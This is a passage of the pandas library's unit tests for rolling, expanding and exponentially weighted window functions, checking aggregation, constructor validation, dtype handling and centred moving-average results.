self.frame = DataFrame(randn(N, K), index=self.rng,
columns=np.arange(K))
class TestApi(Base):
def setup_method(self, method):
self._create_data()
def test_getitem(self):
r = self.frame.rolling(window=5)
tm.assert_index_equal(r._selected_obj.columns, self.frame.columns)
r = self.frame.rolling(window=5)[1]
assert r._selected_obj.name == self.frame.columns[1]
# technically this is allowed
r = self.frame.rolling(window=5)[1, 3]
tm.assert_index_equal(r._selected_obj.columns,
self.frame.columns[[1, 3]])
r = self.frame.rolling(window=5)[[1, 3]]
tm.assert_index_equal(r._selected_obj.columns,
self.frame.columns[[1, 3]])
def test_select_bad_cols(self):
df = DataFrame([[1, 2]], columns=['A', 'B'])
g = df.rolling(window=5)
pytest.raises(KeyError, g.__getitem__, ['C']) # g[['C']]
pytest.raises(KeyError, g.__getitem__, ['A', 'C']) # g[['A', 'C']]
with tm.assert_raises_regex(KeyError, '^[^A]+$'):
# A should not be referenced as a bad column...
# will have to rethink regex if you change message!
g[['A', 'C']]
def test_attribute_access(self):
df = DataFrame([[1, 2]], columns=['A', 'B'])
r = df.rolling(window=5)
tm.assert_series_equal(r.A.sum(), r['A'].sum())
pytest.raises(AttributeError, lambda: r.F)
def tests_skip_nuisance(self):
df = DataFrame({'A': range(5), 'B': range(5, 10), 'C': 'foo'})
r = df.rolling(window=3)
result = r[['A', 'B']].sum()
expected = DataFrame({'A': [np.nan, np.nan, 3, 6, 9],
'B': [np.nan, np.nan, 18, 21, 24]},
columns=list('AB'))
tm.assert_frame_equal(result, expected)
def test_skip_sum_object_raises(self):
df = DataFrame({'A': range(5), 'B': range(5, 10), 'C': 'foo'})
r = df.rolling(window=3)
with tm.assert_raises_regex(TypeError, 'cannot handle this type'):
r.sum()
def test_agg(self):
df = DataFrame({'A': range(5), 'B': range(0, 10, 2)})
r = df.rolling(window=3)
a_mean = r['A'].mean()
a_std = r['A'].std()
a_sum = r['A'].sum()
b_mean = r['B'].mean()
b_std = r['B'].std()
b_sum = r['B'].sum()
result = r.aggregate([np.mean, np.std])
expected = concat([a_mean, a_std, b_mean, b_std], axis=1)
expected.columns = pd.MultiIndex.from_product([['A', 'B'], ['mean',
'std']])
tm.assert_frame_equal(result, expected)
result = r.aggregate({'A': np.mean, 'B': np.std})
expected = concat([a_mean, b_std], axis=1)
tm.assert_frame_equal(result, expected, check_like=True)
result = r.aggregate({'A': ['mean', 'std']})
expected = concat([a_mean, a_std], axis=1)
expected.columns = pd.MultiIndex.from_tuples([('A', 'mean'), ('A',
'std')])
tm.assert_frame_equal(result, expected)
result = r['A'].aggregate(['mean', 'sum'])
expected = concat([a_mean, a_sum], axis=1)
expected.columns = ['mean', 'sum']
tm.assert_frame_equal(result, expected)
with catch_warnings(record=True):
result = r.aggregate({'A': {'mean': 'mean', 'sum': 'sum'}})
expected = concat([a_mean, a_sum], axis=1)
expected.columns = pd.MultiIndex.from_tuples([('A', 'mean'),
('A', 'sum')])
tm.assert_frame_equal(result, expected, check_like=True)
with catch_warnings(record=True):
result = r.aggregate({'A': {'mean': 'mean',
'sum': 'sum'},
'B': {'mean2': 'mean',
'sum2': 'sum'}})
expected = concat([a_mean, a_sum, b_mean, b_sum], axis=1)
exp_cols = [('A', 'mean'), ('A', 'sum'), ('B', 'mean2'), ('B', 'sum2')]
expected.columns = pd.MultiIndex.from_tuples(exp_cols)
tm.assert_frame_equal(result, expected, check_like=True)
result = r.aggregate({'A': ['mean', 'std'], 'B': ['mean', 'std']})
expected = concat([a_mean, a_std, b_mean, b_std], axis=1)
exp_cols = [('A', 'mean'), ('A', 'std'), ('B', 'mean'), ('B', 'std')]
expected.columns = pd.MultiIndex.from_tuples(exp_cols)
tm.assert_frame_equal(result, expected, check_like=True)
def test_agg_apply(self, raw):
# passed lambda
df = DataFrame({'A': range(5), 'B': range(0, 10, 2)})
r = df.rolling(window=3)
a_sum = r['A'].sum()
result = r.agg({'A': np.sum, 'B': lambda x: np.std(x, ddof=1)})
rcustom = r['B'].apply(lambda x: np.std(x, ddof=1), raw=raw)
expected = concat([a_sum, rcustom], axis=1)
tm.assert_frame_equal(result, expected, check_like=True)
def test_agg_consistency(self):
df = DataFrame({'A': range(5), 'B': range(0, 10, 2)})
r = df.rolling(window=3)
result = r.agg([np.sum, np.mean]).columns
expected = pd.MultiIndex.from_product([list('AB'), ['sum', 'mean']])
tm.assert_index_equal(result, expected)
result = r['A'].agg([np.sum, np.mean]).columns
expected = Index(['sum', 'mean'])
tm.assert_index_equal(result, expected)
result = r.agg({'A': [np.sum, np.mean]}).columns
expected = pd.MultiIndex.from_tuples([('A', 'sum'), ('A', 'mean')])
tm.assert_index_equal(result, expected)
def test_agg_nested_dicts(self):
# API change for disallowing these types of nested dicts
df = DataFrame({'A': range(5), 'B': range(0, 10, 2)})
r = df.rolling(window=3)
def f():
r.aggregate({'r1': {'A': ['mean', 'sum']},
'r2': {'B': ['mean', 'sum']}})
pytest.raises(SpecificationError, f)
expected = concat([r['A'].mean(), r['A'].std(),
r['B'].mean(), r['B'].std()], axis=1)
expected.columns = pd.MultiIndex.from_tuples([('ra', 'mean'), (
'ra', 'std'), ('rb', 'mean'), ('rb', 'std')])
with catch_warnings(record=True):
result = r[['A', 'B']].agg({'A': {'ra': ['mean', 'std']},
'B': {'rb': ['mean', 'std']}})
tm.assert_frame_equal(result, expected, check_like=True)
with catch_warnings(record=True):
result = r.agg({'A': {'ra': ['mean', 'std']},
'B': {'rb': ['mean', 'std']}})
expected.columns = pd.MultiIndex.from_tuples([('A', 'ra', 'mean'), (
'A', 'ra', 'std'), ('B', 'rb', 'mean'), ('B', 'rb', 'std')])
tm.assert_frame_equal(result, expected, check_like=True)
def test_count_nonnumeric_types(self):
# GH12541
cols = ['int', 'float', 'string', 'datetime', 'timedelta', 'periods',
'fl_inf', 'fl_nan', 'str_nan', 'dt_nat', 'periods_nat']
df = DataFrame(
{'int': [1, 2, 3],
'float': [4., 5., 6.],
'string': list('abc'),
'datetime': pd.date_range('20170101', periods=3),
'timedelta': pd.timedelta_range('1 s', periods=3, freq='s'),
'periods': [pd.Period('2012-01'), pd.Period('2012-02'),
pd.Period('2012-03')],
'fl_inf': [1., 2., np.Inf],
'fl_nan': [1., 2., np.NaN],
'str_nan': ['aa', 'bb', np.NaN],
'dt_nat': [Timestamp('20170101'), Timestamp('20170203'),
Timestamp(None)],
'periods_nat': [pd.Period('2012-01'), pd.Period('2012-02'),
pd.Period(None)]},
columns=cols)
expected = DataFrame(
{'int': [1., 2., 2.],
'float': [1., 2., 2.],
'string': [1., 2., 2.],
'datetime': [1., 2., 2.],
'timedelta': [1., 2., 2.],
'periods': [1., 2., 2.],
'fl_inf': [1., 2., 2.],
'fl_nan': [1., 2., 1.],
'str_nan': [1., 2., 1.],
'dt_nat': [1., 2., 1.],
'periods_nat': [1., 2., 1.]},
columns=cols)
result = df.rolling(window=2).count()
tm.assert_frame_equal(result, expected)
result = df.rolling(1).count()
expected = df.notna().astype(float)
tm.assert_frame_equal(result, expected)
@td.skip_if_no_scipy
def test_window_with_args(self):
# make sure that we are aggregating window functions correctly with arg
r = Series(np.random.randn(100)).rolling(window=10, min_periods=1,
win_type='gaussian')
expected = concat([r.mean(std=10), r.mean(std=.01)], axis=1)
expected.columns = ['<lambda>', '<lambda>']
result = r.aggregate([lambda x: x.mean(std=10),
lambda x: x.mean(std=.01)])
tm.assert_frame_equal(result, expected)
def a(x):
return x.mean(std=10)
def b(x):
return x.mean(std=0.01)
expected = concat([r.mean(std=10), r.mean(std=.01)], axis=1)
expected.columns = ['a', 'b']
result = r.aggregate([a, b])
tm.assert_frame_equal(result, expected)
def test_preserve_metadata(self):
# GH 10565
s = Series(np.arange(100), name='foo')
s2 = s.rolling(30).sum()
s3 = s.rolling(20).sum()
assert s2.name == 'foo'
assert s3.name == 'foo'
class TestWindow(Base):
def setup_method(self, method):
self._create_data()
@td.skip_if_no_scipy
@pytest.mark.parametrize(
'which', ['series', 'frame'])
def test_constructor(self, which):
# GH 12669
o = getattr(self, which)
c = o.rolling
# valid
c(win_type='boxcar', window=2, min_periods=1)
c(win_type='boxcar', window=2, min_periods=1, center=True)
c(win_type='boxcar', window=2, min_periods=1, center=False)
# not valid
for w in [2., 'foo', np.array([2])]:
with pytest.raises(ValueError):
c(win_type='boxcar', window=2, min_periods=w)
with pytest.raises(ValueError):
c(win_type='boxcar', window=2, min_periods=1, center=w)
for wt in ['foobar', 1]:
with pytest.raises(ValueError):
c(win_type=wt, window=2)
@td.skip_if_no_scipy
@pytest.mark.parametrize(
'which', ['series', 'frame'])
def test_constructor_with_win_type(self, which, win_types):
# GH 12669
o = getattr(self, which)
c = o.rolling
c(win_type=win_types, window=2)
@pytest.mark.parametrize(
'method', ['sum', 'mean'])
def test_numpy_compat(self, method):
# see gh-12811
w = rwindow.Window(Series([2, 4, 6]), window=[0, 2])
msg = "numpy operations are not valid with window objects"
tm.assert_raises_regex(UnsupportedFunctionCall, msg,
getattr(w, method), 1, 2, 3)
tm.assert_raises_regex(UnsupportedFunctionCall, msg,
getattr(w, method), dtype=np.float64)
class TestRolling(Base):
def setup_method(self, method):
self._create_data()
def test_doc_string(self):
df = DataFrame({'B': [0, 1, 2, np.nan, 4]})
df
df.rolling(2).sum()
df.rolling(2, min_periods=1).sum()
@pytest.mark.parametrize(
'which', ['series', 'frame'])
def test_constructor(self, which):
# GH 12669
o = getattr(self, which)
c = o.rolling
# valid
c(window=2)
c(window=2, min_periods=1)
c(window=2, min_periods=1, center=True)
c(window=2, min_periods=1, center=False)
# GH 13383
with pytest.raises(ValueError):
c(0)
c(-1)
# not valid
for w in [2., 'foo', np.array([2])]:
with pytest.raises(ValueError):
c(window=w)
with pytest.raises(ValueError):
c(window=2, min_periods=w)
with pytest.raises(ValueError):
c(window=2, min_periods=1, center=w)
@td.skip_if_no_scipy
@pytest.mark.parametrize(
'which', ['series', 'frame'])
def test_constructor_with_win_type(self, which):
# GH 13383
o = getattr(self, which)
c = o.rolling
with pytest.raises(ValueError):
c(-1, win_type='boxcar')
@pytest.mark.parametrize(
'window', [timedelta(days=3), pd.Timedelta(days=3)])
def test_constructor_with_timedelta_window(self, window):
# GH 15440
n = 10
df = DataFrame({'value': np.arange(n)},
index=pd.date_range('2015-12-24', periods=n, freq="D"))
expected_data = np.append([0., 1.], np.arange(3., 27., 3))
result = df.rolling(window=window).sum()
expected = DataFrame({'value': expected_data},
index=pd.date_range('2015-12-24', periods=n,
freq="D"))
tm.assert_frame_equal(result, expected)
expected = df.rolling('3D').sum()
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
'window', [timedelta(days=3), pd.Timedelta(days=3), '3D'])
def test_constructor_timedelta_window_and_minperiods(self, window, raw):
# GH 15305
n = 10
df = DataFrame({'value': np.arange(n)},
index=pd.date_range('2017-08-08', periods=n, freq="D"))
expected = DataFrame(
{'value': np.append([np.NaN, 1.], np.arange(3., 27., 3))},
index=pd.date_range('2017-08-08', periods=n, freq="D"))
result_roll_sum = df.rolling(window=window, min_periods=2).sum()
result_roll_generic = df.rolling(window=window,
min_periods=2).apply(sum, raw=raw)
tm.assert_frame_equal(result_roll_sum, expected)
tm.assert_frame_equal(result_roll_generic, expected)
@pytest.mark.parametrize(
'method', ['std', 'mean', 'sum', 'max', 'min', 'var'])
def test_numpy_compat(self, method):
# see gh-12811
r = rwindow.Rolling(Series([2, 4, 6]), window=2)
msg = "numpy operations are not valid with window objects"
tm.assert_raises_regex(UnsupportedFunctionCall, msg,
getattr(r, method), 1, 2, 3)
tm.assert_raises_regex(UnsupportedFunctionCall, msg,
getattr(r, method), dtype=np.float64)
def test_closed(self):
df = DataFrame({'A': [0, 1, 2, 3, 4]})
# closed only allowed for datetimelike
with pytest.raises(ValueError):
df.rolling(window=3, closed='neither')
@pytest.mark.parametrize('roller', ['1s', 1])
def tests_empty_df_rolling(self, roller):
# GH 15819 Verifies that datetime and integer rolling windows can be
# applied to empty DataFrames
expected = DataFrame()
result = DataFrame().rolling(roller).sum()
tm.assert_frame_equal(result, expected)
# Verifies that datetime and integer rolling windows can be applied to
# empty DataFrames with datetime index
expected = DataFrame(index=pd.DatetimeIndex([]))
result = DataFrame(index=pd.DatetimeIndex([])).rolling(roller).sum()
tm.assert_frame_equal(result, expected)
def test_missing_minp_zero(self):
# https://github.com/pandas-dev/pandas/pull/18921
# minp=0
x = pd.Series([np.nan])
result = x.rolling(1, min_periods=0).sum()
expected = pd.Series([0.0])
tm.assert_series_equal(result, expected)
# minp=1
result = x.rolling(1, min_periods=1).sum()
expected = pd.Series([np.nan])
tm.assert_series_equal(result, expected)
def test_missing_minp_zero_variable(self):
# https://github.com/pandas-dev/pandas/pull/18921
x = pd.Series([np.nan] * 4,
index=pd.DatetimeIndex(['2017-01-01', '2017-01-04',
'2017-01-06', '2017-01-07']))
result = x.rolling(pd.Timedelta("2d"), min_periods=0).sum()
expected = pd.Series(0.0, index=x.index)
tm.assert_series_equal(result, expected)
def test_multi_index_names(self):
# GH 16789, 16825
cols = pd.MultiIndex.from_product([['A', 'B'], ['C', 'D', 'E']],
names=['1', '2'])
df = DataFrame(np.ones((10, 6)), columns=cols)
result = df.rolling(3).cov()
tm.assert_index_equal(result.columns, df.columns)
assert result.index.names == [None, '1', '2']
@pytest.mark.parametrize('klass', [pd.Series, pd.DataFrame])
def test_iter_raises(self, klass):
# https://github.com/pandas-dev/pandas/issues/11704
# Iteration over a Window
obj = klass([1, 2, 3, 4])
with pytest.raises(NotImplementedError):
iter(obj.rolling(2))
class TestExpanding(Base):
def setup_method(self, method):
self._create_data()
def test_doc_string(self):
df = DataFrame({'B': [0, 1, 2, np.nan, 4]})
df
df.expanding(2).sum()
@pytest.mark.parametrize(
'which', ['series', 'frame'])
def test_constructor(self, which):
# GH 12669
o = getattr(self, which)
c = o.expanding
# valid
c(min_periods=1)
c(min_periods=1, center=True)
c(min_periods=1, center=False)
# not valid
for w in [2., 'foo', np.array([2])]:
with pytest.raises(ValueError):
c(min_periods=w)
with pytest.raises(ValueError):
c(min_periods=1, center=w)
@pytest.mark.parametrize(
'method', ['std', 'mean', 'sum', 'max', 'min', 'var'])
def test_numpy_compat(self, method):
# see gh-12811
e = rwindow.Expanding(Series([2, 4, 6]), window=2)
msg = "numpy operations are not valid with window objects"
tm.assert_raises_regex(UnsupportedFunctionCall, msg,
getattr(e, method), 1, 2, 3)
tm.assert_raises_regex(UnsupportedFunctionCall, msg,
getattr(e, method), dtype=np.float64)
@pytest.mark.parametrize(
'expander',
[1, pytest.param('ls', marks=pytest.mark.xfail(
reason='GH 16425 expanding with '
'offset not supported'))])
def test_empty_df_expanding(self, expander):
# GH 15819 Verifies that datetime and integer expanding windows can be
# applied to empty DataFrames
expected = DataFrame()
result = DataFrame().expanding(expander).sum()
tm.assert_frame_equal(result, expected)
# Verifies that datetime and integer expanding windows can be applied
# to empty DataFrames with datetime index
expected = DataFrame(index=pd.DatetimeIndex([]))
result = DataFrame(
index=pd.DatetimeIndex([])).expanding(expander).sum()
tm.assert_frame_equal(result, expected)
def test_missing_minp_zero(self):
# https://github.com/pandas-dev/pandas/pull/18921
# minp=0
x = pd.Series([np.nan])
result = x.expanding(min_periods=0).sum()
expected = pd.Series([0.0])
tm.assert_series_equal(result, expected)
# minp=1
result = x.expanding(min_periods=1).sum()
expected = pd.Series([np.nan])
tm.assert_series_equal(result, expected)
@pytest.mark.parametrize('klass', [pd.Series, pd.DataFrame])
def test_iter_raises(self, klass):
# https://github.com/pandas-dev/pandas/issues/11704
# Iteration over a Window
obj = klass([1, 2, 3, 4])
with pytest.raises(NotImplementedError):
iter(obj.expanding(2))
class TestEWM(Base):
def setup_method(self, method):
self._create_data()
def test_doc_string(self):
df = DataFrame({'B': [0, 1, 2, np.nan, 4]})
df
df.ewm(com=0.5).mean()
@pytest.mark.parametrize(
'which', ['series', 'frame'])
def test_constructor(self, which):
o = getattr(self, which)
c = o.ewm
# valid
c(com=0.5)
c(span=1.5)
c(alpha=0.5)
c(halflife=0.75)
c(com=0.5, span=None)
c(alpha=0.5, com=None)
c(halflife=0.75, alpha=None)
# not valid: mutually exclusive
with pytest.raises(ValueError):
c(com=0.5, alpha=0.5)
with pytest.raises(ValueError):
c(span=1.5, halflife=0.75)
with pytest.raises(ValueError):
c(alpha=0.5, span=1.5)
# not valid: com < 0
with pytest.raises(ValueError):
c(com=-0.5)
# not valid: span < 1
with pytest.raises(ValueError):
c(span=0.5)
# not valid: halflife <= 0
with pytest.raises(ValueError):
c(halflife=0)
# not valid: alpha <= 0 or alpha > 1
for alpha in (-0.5, 1.5):
with pytest.raises(ValueError):
c(alpha=alpha)
@pytest.mark.parametrize(
'method', ['std', 'mean', 'var'])
def test_numpy_compat(self, method):
# see gh-12811
e = rwindow.EWM(Series([2, 4, 6]), alpha=0.5)
msg = "numpy operations are not valid with window objects"
tm.assert_raises_regex(UnsupportedFunctionCall, msg,
getattr(e, method), 1, 2, 3)
tm.assert_raises_regex(UnsupportedFunctionCall, msg,
getattr(e, method), dtype=np.float64)
# gh-12373 : rolling functions error on float32 data
# make sure rolling functions works for different dtypes
#
# NOTE that these are yielded tests and so _create_data
# is explicitly called.
#
# further note that we are only checking rolling for fully dtype
# compliance (though both expanding and ewm inherit)
class Dtype(object):
window = 2
funcs = {
'count': lambda v: v.count(),
'max': lambda v: v.max(),
'min': lambda v: v.min(),
'sum': lambda v: v.sum(),
'mean': lambda v: v.mean(),
'std': lambda v: v.std(),
'var': lambda v: v.var(),
'median': lambda v: v.median()
}
def get_expects(self):
expects = {
'sr1': {
'count': Series([1, 2, 2, 2, 2], dtype='float64'),
'max': Series([np.nan, 1, 2, 3, 4], dtype='float64'),
'min': Series([np.nan, 0, 1, 2, 3], dtype='float64'),
'sum': Series([np.nan, 1, 3, 5, 7], dtype='float64'),
'mean': Series([np.nan, .5, 1.5, 2.5, 3.5], dtype='float64'),
'std': Series([np.nan] + [np.sqrt(.5)] * 4, dtype='float64'),
'var': Series([np.nan, .5, .5, .5, .5], dtype='float64'),
'median': Series([np.nan, .5, 1.5, 2.5, 3.5], dtype='float64')
},
'sr2': {
'count': Series([1, 2, 2, 2, 2], dtype='float64'),
'max': Series([np.nan, 10, 8, 6, 4], dtype='float64'),
'min': Series([np.nan, 8, 6, 4, 2], dtype='float64'),
'sum': Series([np.nan, 18, 14, 10, 6], dtype='float64'),
'mean': Series([np.nan, 9, 7, 5, 3], dtype='float64'),
'std': Series([np.nan] + [np.sqrt(2)] * 4, dtype='float64'),
'var': Series([np.nan, 2, 2, 2, 2], dtype='float64'),
'median': Series([np.nan, 9, 7, 5, 3], dtype='float64')
},
'df': {
'count': DataFrame({0: Series([1, 2, 2, 2, 2]),
1: Series([1, 2, 2, 2, 2])},
dtype='float64'),
'max': DataFrame({0: Series([np.nan, 2, 4, 6, 8]),
1: Series([np.nan, 3, 5, 7, 9])},
dtype='float64'),
'min': DataFrame({0: Series([np.nan, 0, 2, 4, 6]),
1: Series([np.nan, 1, 3, 5, 7])},
dtype='float64'),
'sum': DataFrame({0: Series([np.nan, 2, 6, 10, 14]),
1: Series([np.nan, 4, 8, 12, 16])},
dtype='float64'),
'mean': DataFrame({0: Series([np.nan, 1, 3, 5, 7]),
1: Series([np.nan, 2, 4, 6, 8])},
dtype='float64'),
'std': DataFrame({0: Series([np.nan] + [np.sqrt(2)] * 4),
1: Series([np.nan] + [np.sqrt(2)] * 4)},
dtype='float64'),
'var': DataFrame({0: Series([np.nan, 2, 2, 2, 2]),
1: Series([np.nan, 2, 2, 2, 2])},
dtype='float64'),
'median': DataFrame({0: Series([np.nan, 1, 3, 5, 7]),
1: Series([np.nan, 2, 4, 6, 8])},
dtype='float64'),
}
}
return expects
def _create_dtype_data(self, dtype):
sr1 = Series(np.arange(5), dtype=dtype)
sr2 = Series(np.arange(10, 0, -2), dtype=dtype)
df = DataFrame(np.arange(10).reshape((5, 2)), dtype=dtype)
data = {
'sr1': sr1,
'sr2': sr2,
'df': df
}
return data
def _create_data(self):
self.data = self._create_dtype_data(self.dtype)
self.expects = self.get_expects()
def test_dtypes(self):
self._create_data()
for f_name, d_name in product(self.funcs.keys(), self.data.keys()):
f = self.funcs[f_name]
d = self.data[d_name]
exp = self.expects[d_name][f_name]
self.check_dtypes(f, f_name, d, d_name, exp)
def check_dtypes(self, f, f_name, d, d_name, exp):
roll = d.rolling(window=self.window)
result = f(roll)
tm.assert_almost_equal(result, exp)
class TestDtype_object(Dtype):
dtype = object
class Dtype_integer(Dtype):
pass
class TestDtype_int8(Dtype_integer):
dtype = np.int8
class TestDtype_int16(Dtype_integer):
dtype = np.int16
class TestDtype_int32(Dtype_integer):
dtype = np.int32
class TestDtype_int64(Dtype_integer):
dtype = np.int64
class Dtype_uinteger(Dtype):
pass
class TestDtype_uint8(Dtype_uinteger):
dtype = np.uint8
class TestDtype_uint16(Dtype_uinteger):
dtype = np.uint16
class TestDtype_uint32(Dtype_uinteger):
dtype = np.uint32
class TestDtype_uint64(Dtype_uinteger):
dtype = np.uint64
class Dtype_float(Dtype):
pass
class TestDtype_float16(Dtype_float):
dtype = np.float16
class TestDtype_float32(Dtype_float):
dtype = np.float32
class TestDtype_float64(Dtype_float):
dtype = np.float64
class TestDtype_category(Dtype):
dtype = 'category'
include_df = False
def _create_dtype_data(self, dtype):
sr1 = Series(range(5), dtype=dtype)
sr2 = Series(range(10, 0, -2), dtype=dtype)
data = {
'sr1': sr1,
'sr2': sr2
}
return data
class DatetimeLike(Dtype):
def check_dtypes(self, f, f_name, d, d_name, exp):
roll = d.rolling(window=self.window)
if f_name == 'count':
result = f(roll)
tm.assert_almost_equal(result, exp)
else:
# other methods not Implemented ATM
with pytest.raises(NotImplementedError):
f(roll)
class TestDtype_timedelta(DatetimeLike):
dtype = np.dtype('m8[ns]')
class TestDtype_datetime(DatetimeLike):
dtype = np.dtype('M8[ns]')
class TestDtype_datetime64UTC(DatetimeLike):
dtype = 'datetime64[ns, UTC]'
def _create_data(self):
pytest.skip("direct creation of extension dtype "
"datetime64[ns, UTC] is not supported ATM")
class TestMoments(Base):
def setup_method(self, method):
self._create_data()
def test_centered_axis_validation(self):
# ok
Series(np.ones(10)).rolling(window=3, center=True, axis=0).mean()
# bad axis
with pytest.raises(ValueError):
Series(np.ones(10)).rolling(window=3, center=True, axis=1).mean()
# ok ok
DataFrame(np.ones((10, 10))).rolling(window=3, center=True,
axis=0).mean()
DataFrame(np.ones((10, 10))).rolling(window=3, center=True,
axis=1).mean()
# bad axis
with pytest.raises(ValueError):
(DataFrame(np.ones((10, 10)))
.rolling(window=3, center=True, axis=2).mean())
def test_rolling_sum(self):
self._check_moment_func(np.nansum, name='sum',
zero_min_periods_equal=False)
def test_rolling_count(self):
counter = lambda x: np.isfinite(x).astype(float).sum()
self._check_moment_func(counter, name='count', has_min_periods=False,
fill_value=0)
def test_rolling_mean(self):
self._check_moment_func(np.mean, name='mean')
@td.skip_if_no_scipy
def test_cmov_mean(self):
# GH 8238
vals = np.array([6.95, 15.21, 4.72, 9.12, 13.81, 13.49, 16.68, 9.48,
10.63, 14.48])
result = Series(vals).rolling(5, center=True).mean()
expected = Series([np.nan, np.nan, 9.962, 11.27, 11.564, 12.516,
12.818, 12.952, np.nan, np.nan])
tm.assert_series_equal(expected, result)
@td.skip_if_no_scipy
def test_cmov_window(self):
# GH 8238
vals = np.array([6.95, 15.21, 4.72, 9.12, 13.81, 13.49, 16.68, 9.48,
10.63, 14.48])
result = Series(vals).rolling(5, win_type='boxcar', center=True).mean()
expected = Series([np.nan, np.nan, 9.962, 11.27, 11.564, 12.516,
12.818, 12.952, np.nan, np.nan])
tm.assert_series_equal(expected, result)
@td.skip_if_no_scipy
def test_cmov_window_corner(self):
# GH 8238
# all nan
vals = pd.Series([np.nan] * 10)
result = vals.rolling(5, center=True, win_type='boxcar').mean()
assert np.isnan(result).all()
# empty
vals = pd.Series([])
result = vals.rolling(5, center=True, win_type='boxcar').mean()
assert len(result) == 0
# shorter than window
vals = pd.Series(np.random.randn(5))
result = vals.rolling(10, win_type='boxcar').mean()
assert np.isnan(result).all()
assert len(result) == 5
@td.skip_if_no_scipy
def test_cmov_window_frame(self):
# Gh 8238
vals = np.array([[12.18, 3.64], [10.18, 9.16], [13.24, 14.61],
[4.51, 8.11], [6.15, 11.44], [9.14, 6.21],
[11.31, 10.67], [2.94, 6.51], [9.42, 8.39], [12.44,
7.34]])
xp = np.array([[np.nan, np.nan], [np.nan, np.nan], [9.252, 9.392],
[8.644, 9.906], [8.87, 10.208], [6.81, 8.588],
[7.792, 8.644], [9.05, 7.824], [np.nan, np.nan
], [np.nan, np.nan]])
# DataFrame
rs = DataFrame(vals).rolling(5, win_type='boxcar', center=True).mean()
tm.assert_frame_equal(DataFrame(xp), rs)
# invalid method
with pytest.raises(AttributeError):
(DataFrame(vals).rolling(5, win_type='boxcar', center=True)
.std())
# sum
xp = np.array([[np.nan, np.nan], [np.nan, np.nan], [46.26, 46.96],
[43.22, 49.53], [44.35, 51.04], [34.05, 42.94],
[38.96, 43.22], [45.25, 39.12], [np.nan, np.nan
], [np.nan, np.nan]])
rs = DataFrame(vals).rolling(5, win_type='boxcar', center=True).sum()
tm.assert_frame_equal(DataFrame(xp), rs)
@td.skip_if_no_scipy
def test_cmov_window_na_min_periods(self):
# min_periods
vals = Series(np.random.randn(10))
vals[4] = np.nan
vals[8] = np.nan
xp = vals.rolling(5, min_periods=4, center=True).mean()
rs = vals.rolling(5, win_type='boxcar', min_periods=4,
center=True).mean()
tm.assert_series_equal(xp, rs)
@td.skip_if_no_scipy
def test_cmov_window_regular(self, win_types):
# GH 8238
vals = np.array([6.95, 15.21, 4.72, 9.12, 13.81, 13.49, 16.68, 9.48,
10.63, 14.48])
xps = {
'hamming': [np.nan, np.nan, 8.71384, 9.56348, 12.38009, 14.03687,
13.8567, 11.81473, np.nan, np.nan],
'triang': [np.nan, np.nan, 9.28667, 10.34667, 12.00556, 13.33889,
13.38, 12.33667, np.nan, np.nan],
'barthann': [np.nan, np.nan, 8.4425, 9.1925, 12.5575, 14.3675,
14.0825, 11.5675, np.nan, np.nan],
'bohman': [np.nan, np.nan, 7.61599, 9.1764, 12.83559, 14.17267,
14.65923, 11.10401, np.nan, np.nan],
'blackmanharris': [np.nan, np.nan, 6.97691, 9.16438, 13.05052,
14.02156, 15.10512, 10.74574, np.nan, np.nan],
'nuttall': [np.nan, np.nan, 7.04618, 9.16786, 13.02671, 14.03559,
15.05657, 10.78514, np.nan, np.nan],
'blackman': [np.nan, np.nan, 7.73345, 9.17869, 12.79607, 14.20036,
14.57726, 11.16988, np.nan, np.nan],
'bartlett': [np.nan, np.nan, 8.4425, 9.1925, 12.5575, 14.3675,
14.0825, 11.5675, np.nan, np.nan]
}
xp = Series(xps[win_types])
rs = Series(vals).rolling(5, win_type=win_types, center=True).mean()
tm.assert_series_equal(xp, rs)
@td.skip_if_no_scipy
def test_cmov_window_regular_linear_range(self, win_types):
# GH 8238
vals = np.array(range(10), dtype=np.float)
xp = vals.copy()
xp[:2] = np.nan
xp[-2:] = np.nan
xp = Series(xp)
rs = Series(vals).rolling(5, win_type=win_types, center=True).mean()
tm.assert_series_equal(xp, rs)
@td.skip_if_no_scipy
def test_cmov_window_regular_missing_data(self, win_types):
# GH 8238
vals = np.array([6.95, 15.21, 4.72, 9.12, 13.81, 13.49, 16.68, np.nan,
10.63, 14.48])
xps = {
'bartlett': [np.nan, np.nan, 9.70333, 10.5225, 8.4425, 9.1925,
12.5575, 14.3675, 15.61667, 13.655],
'blackman': [np.nan, np.nan, 9.04582, 11.41536, 7.73345, 9.17869,
12.79607, 14.20036, 15.8706, 13.655],
'barthann': [np.nan, np.nan, 9.70333, 10.5225, 8.4425, 9.1925,
12.5575, 14.3675, 15.61667, 13.655],
'bohman': [np.nan, np.nan, 8.9444, 11.56327, 7.61599, 9.1764,
12.83559, 14.17267, 15.90976, 13.655],
'hamming': [np.nan, np.nan, 9.59321, 10.29694, 8.71384, 9.56348,
12.38009, 14.20565, 15.24694, 13.69758],
'nuttall': [np.nan, np.nan, 8.47693, 12.2821, 7.04618, 9.16786,
13.02671, 14.03673, 16.08759, 13.65553],
'triang': [np.nan, np.nan, 9.33167, 9.76125, 9.28667, 10.34667,
12.00556, 13.82125, 14.49429, 13.765],
'blackmanharris': [np.nan, np.nan, 8.42526, 12.36824, 6.97691,
9.16438, 13.05052, 14.02175, 16.1098, 13.65509]
}
xp = Series(xps[win_types])
rs = Series(vals).rolling(5, win_type=win_types, min_periods=3).mean()
tm.assert_series_equal(xp, rs)
@td.skip_if_no_scipy
def test_cmov_window_special(self, win_types_special):
# GH 8238
kwds = {
'kaiser': {'beta': 1.},
'gaussian': {'std': 1.},
'general_gaussian': {'power': 2., 'width': 2.}}
vals = np.array([6.95, 15.21, 4.72, 9.12, 13.81, 13.49, 16.68, 9.48,
10.63, 14.48])
xps = {
'gaussian': [np.nan, np.nan, 8.97297, 9.76077, 12.24763, 13.89053,
13.65671, 12.01002, np.nan, np.nan],
'general_gaussian': [np.nan, np.nan, 9.85011, 10.71589, 11.73161,
13.08516, 12.95111, 12.74577, np.nan, np.nan],
'kaiser': [np.nan, np.nan, 9.86851, 11.02969, 11.65161, 12.75129,
12.90702, 12.83757, np.nan, np.nan]
}
xp = Series(xps[win_types_special])
rs = Series(vals).rolling(
5, win_type=win_types_special, center=True).mean(
**kwds[win_types_special])
tm.assert_series_equal(xp, rs)
@td.skip_if_no_scipy
def test_cmov_window_special_linear_range(self, win_types_special):
# GH 8238
kwds = {
'kaiser': {'beta': 1.},
'gaussian': {'std': 1.},
'general_gaussian': {'power': 2., 'width': 2.},
'slepian': {'width': 0.5}}
